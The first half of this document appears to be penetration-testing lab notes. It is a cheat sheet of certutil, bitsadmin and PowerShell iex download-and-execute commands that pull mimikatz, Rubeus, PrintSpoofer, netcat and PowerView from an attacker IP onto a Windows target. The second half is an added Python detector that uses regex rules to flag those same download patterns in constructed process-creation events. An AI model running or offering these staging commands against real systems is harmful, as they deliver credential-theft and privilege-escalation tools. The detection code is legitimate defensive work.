#### Tool list

```
Put all tools under osep/self_tools
certutil -urlcache -split -f http://ipaddress/ps1/Find-WMILocalAdminAccess.ps1
certutil -urlcache -split -f http://ipaddress/ps1/HostRecon.ps1
certutil -urlcache -split -f http://ipaddress/ps1/LAPSToolkit.ps1
certutil -urlcache -split -f http://ipaddress/ps1/PowerUp.ps1
certutil -urlcache -split -f http://ipaddress/ps1/PowerUpSQL.ps1
certutil -urlcache -split -f http://ipaddress/exe/incognito.exe
certutil -urlcache -split -f http://ipaddress/exe/nc.exe
certutil -urlcache -split -f http://ipaddress/exe/psexec.exe
```

#### Tools that are always needed

```
certutil -urlcache -split -f http://ipaddress/mimikatz.exe
certutil -urlcache -split -f http://ipaddress/PrintSpoofer.exe
certutil -urlcache -split -f http://ipaddress/PsExec64.exe
certutil -urlcache -split -f http://ipaddress/Rubeus.exe
certutil -urlcache -split -f http://ipaddress/findspn.ps1
certutil -urlcache -split -f http://ipaddress/invoke-hunter.ps1
certutil -urlcache -split -f http://ipaddress/PowerUp.ps1
certutil -urlcache -split -f http://ipaddress/powerview.ps1
certutil -urlcache -split -f http://192.168.49.57:83/SharpHound.exe
certutil -urlcache -split -f http://192.168.49.57/SpoolSample.exe
```

### downloader

```
certutil -urlcache -split -f http://ipaddress/shell.exe
bitsadmin /transfer n http://ipaddress/5.exe c:\users\public\a.exe && c:\users\public\a.exe
powershell.exe -ep bypass -command "iex (iwr ipaddress/ipw.ps1 -UseBasicParsing)"
```

### One-liners

```
(New-Object System.Net.WebClient).DownloadString('http://192.168.49.57:82/PowerView.ps1') | iex
(New-Object System.Net.WebClient).DownloadString('http://192.168.49.57:82/powermad.ps1') | iex
certutil -urlcache -split -f http://ipaddress/PowerUp.ps1
certutil -urlcache -split -f http://ipaddress/mimikatz.exe
certutil -urlcache -split -f http://ipaddress/PsExec64.exe
certutil -urlcache -split -f http://ipaddress/Rubeus.exe
```

## Points to note

```
copy \\192.168.49.57\test\hw.txt c:\users\public\x.txt
```
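The downloader and one-liner sections above all rely on the same three living-off-the-land patterns (certutil -urlcache, bitsadmin /transfer, and a PowerShell iex/iwr or WebClient.DownloadString cradle), which is exactly what a detection engineer keys on in process-creation telemetry. The following is an added example, not part of the original notes: a small Python classifier that runs these three rules over constructed process-creation records (image path and command line, in the style of Sysmon event 1 or Windows event 4688). The sample events, rule names and the 10.0.0.5 host are all constructed for illustration.

```python
import re

# Constructed sample process-creation records (image, command line).
# These are made-up events, not telemetry from any real host.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\certutil.exe",
     "certutil -urlcache -split -f http://10.0.0.5/PowerUp.ps1"),
    (r"C:\Windows\System32\certutil.exe",
     r"certutil -hashfile C:\Users\public\file.txt SHA256"),   # benign certutil use
    (r"C:\Windows\System32\bitsadmin.exe",
     r"bitsadmin /transfer n http://10.0.0.5/5.exe c:\users\public\a.exe"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     'powershell.exe -ep bypass -command "iex (iwr 10.0.0.5/ipw.ps1 -UseBasicParsing)"'),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -command \"(New-Object System.Net.WebClient)"
     ".DownloadString('http://10.0.0.5/PowerView.ps1') | iex\""),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'powershell.exe -command "Get-Process | Out-File C:\temp\p.txt"'),  # benign
]

# Rule name -> regex over the command line. Rule names are hypothetical labels.
RULES = [
    # certutil used as a downloader: -urlcache plus -f <url>
    ("certutil_urlcache_download",
     r"certutil(\.exe)?\s.*-urlcache\s.*-f\s+\S+"),
    # bitsadmin /transfer pulling from an http(s) source
    ("bitsadmin_transfer_download",
     r"bitsadmin(\.exe)?\s.*/transfer\s.*https?://"),
    # PowerShell cradle: an Invoke-Expression plus a download primitive
    ("powershell_download_cradle",
     r"(?=.*\b(iex|invoke-expression)\b)"
     r"(?=.*\b(iwr|invoke-webrequest|downloadstring|downloadfile|net\.webclient)\b)"),
]
COMPILED = [(name, re.compile(rx, re.IGNORECASE)) for name, rx in RULES]


def classify(command_line):
    """Return the names of every rule the command line triggers (empty if none)."""
    return [name for name, rx in COMPILED if rx.search(command_line)]


def scan(events):
    """Return (index, image, tags) for each event that triggers at least one rule."""
    hits = []
    for i, (image, cmd) in enumerate(events):
        tags = classify(cmd)
        if tags:
            hits.append((i, image, tags))
    return hits


if __name__ == "__main__":
    for idx, image, tags in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {image} -> {', '.join(tags)}")
```

The two benign records (certutil -hashfile and a plain Get-Process pipeline) are there to show that the rules key on the download flags rather than on the binary name alone; in production the command-line match would normally be joined with parent-process and network-connection context to keep false positives down.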